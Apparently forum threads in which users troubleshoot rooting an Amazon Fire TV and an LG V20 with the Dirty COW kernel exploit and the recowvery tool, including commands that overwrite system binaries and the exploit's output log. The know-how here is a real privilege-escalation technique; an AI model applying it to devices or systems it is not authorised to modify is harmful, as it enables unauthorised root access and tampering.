I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
Click to expand...
Click to collapse
you need to extract the SU binary file from Supersu. apk
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
Do you save the shell script as ip_script.sh?
Sent from my SM-G920P using Tapatalk
VastVenomm said:
I've reached Step 3, I don't understand what you mean by su binary, as in, the whole flashable zip of supersu? or something else? Could you please explain? Thank you
Edit: Before I carry on, I was attempting this on the fire tv *Stick* instead of the box, running 5.2.1.1 would it still work?
Click to expand...
Click to collapse
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
VastVenomm said:
I ran:
./dirtycow /system/bin/ip ip_script
I marked the scripts as 755 as well.
Error:
/system/bin/sh: ./dirtycow: not executable: 64-bit ELF file.
I also tried compiling dirtycow as 32bit. And got:
/system/bin/sh: ./dirtycow: not executable: 32-bit ELF file.
Help would be appreciated, thank you.
Click to expand...
Click to collapse
You compiled the source to x86 code. You need to compile dirtycow with a compiler for arm. I recommend using androids ndk.
I still got 5.0.5.1 on my FTV1. Is there a chance that I might get root using the dirtycow exploit?
christofsteel said:
You do not need to extract the binary from the SuperSU.apk, rather download the zip from here: https://download.chainfire.eu/696/supersu/
Then extract the zipfile and copy the su file from the arm folder.
Edit: I think it would not work because FireOS > 5.2.0.0 has SELinux activated. This method does not seem to work with SELinux.
You compiled the source to x86 code. You need to compile dirtycow with a compiler for arm. I recommend using androids ndk.
Click to expand...
Click to collapse
Rename apk to zip and extract su no diffence from what I posted.

Recowvery issue - adb logcat -s recowvery

Hey all -
I'm trying to root my V20 with some complications along the way!
I'm currently at the Recowvery setup (I've tried manual & "Easy Recowvery") and I cannot seem to get past the "adb logcat -s recowvery" step.
On my command prompt, all I end up seeing is:
--------- beginning of system
--------- beginning of main
to no end. I've waited hours. No "successful" message as stated there should be when it finishes what it needs to do.
I have a feeling this is a permission issue, because when I tried to use the "Easy Recowvery" method, it had said it could not create log files, etc in the directory that I was trying to run the easy setup from.
I then tried to run CMD w/ administrative privileges - same problem, still stuck at the aforementioned information displayed. The only way I can then get out of this is escaping via "Ctrl+C", and nothing ends up being done, because when I try the next step "adb shell reboot recovery", my phone goes to a black screen that just says, "No Command" - and then I have to go into the usual recovery by holding the power button, then volume-up.
Are there any suggestions that could be made here? Tips, etc? I'm using the H918 version of the V20 and I would really like to get it rooted - wanted to use crDroid :3
EDIT (Guides I'm following):
The one from theunlockr
and then the dirtycow git page that's linked in another guide (I cannot post actual links yet, apparently :S)
EDIT2 (add'l info):
C:\adb>adb shell
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ chmod 0777 *
elsa:/data/local/tmp $ ./dirtycow /system/bin/applypatch recowvery-applypatch
warning: new file size (18472) and file old size (165144) differ
size 165144
[*] mmap 0x747ac24000
[*] exploit (patch)
[*] currently 0x747ac24000=10102464c457f
[*] madvise = 0x747ac24000 165144
[*] madvise = 0 1048576
[*] /proc/self/mem 1367343104 1048576
[*] exploited 0x747ac24000=10102464c457f
dirtycow /system/bin/app_process64 recowvery-app_process64 <
warning: new file size (10200) and file old size (18600) differ
size 18600
[*] mmap 0x7331eb7000
[*] exploit (patch)
[*] currently 0x7331eb7000=10102464c457f
[*] madvise = 0x7331eb7000 18600
[*] madvise = 0 1048576
[*] /proc/self/mem -1971322880 1048576
[*] exploited 0x7331eb7000=10102464c457f
elsa:/data/local/tmp $ exit
Not sure if something perhaps went wrong here? Before having to execute the adb logcat -s recowvery command?
EDIT3 (Removed -s from logcat command to see what was going on):
I removed the -s flag from the logcat command to see where it might be stalling..... But after doing this I realized truly what was going on (logcat... duh, logging) - but I never get any kind of message that is said would occur:
adb logcat -s recowvery
"<wait for it to tell you it was successful>"
"[CTRL+C]"
I never get that message, with or without the silent flag.
I feel like the purpose of this step was to log recowvery running? Instead it seems like it's logging EVERYTHING.
Another guide I found said I should be putting my phone in the bootloader/fastloader before running the last bit of steps, but if I do that and try running the adb commands, it will say "null, no device available", or something along those lines.
I no longer know what is going wrong.
EDIT4 (-s is not silent flag when using adb?):
So it turns out the -s flag when using adb isn't the silent flag? Unless it is for logcat? Either way still nothing working. I never get "beginning of crash" like I'm apparently supposed to when running "adb logcat -s recowvery". Halp.
same issue
bump
This issue has been resolved elsewhere. If needed I will make an edit to show the solution once I'm capable of doing so.
May have a working solution. Testing it now and will reply if it works.
---------- Post added at 04:49 AM ---------- Previous post was at 04:47 AM ----------
Yeah, I managed to find the solution myself. Not sure if its the same solution but it was a matter of downgrading my firmware to the previous patch from 10k to 10j through LGUP and it's working fine as of now.
Downgrade from V20 version k to version j
After downgrading from version k to j (via LGUP tool) and having the proper files to go along with it. If I am allowed to post a link to the Reddit post that ended up helping me, I will - however it seems by default I am unable to do so.

Categories

Resources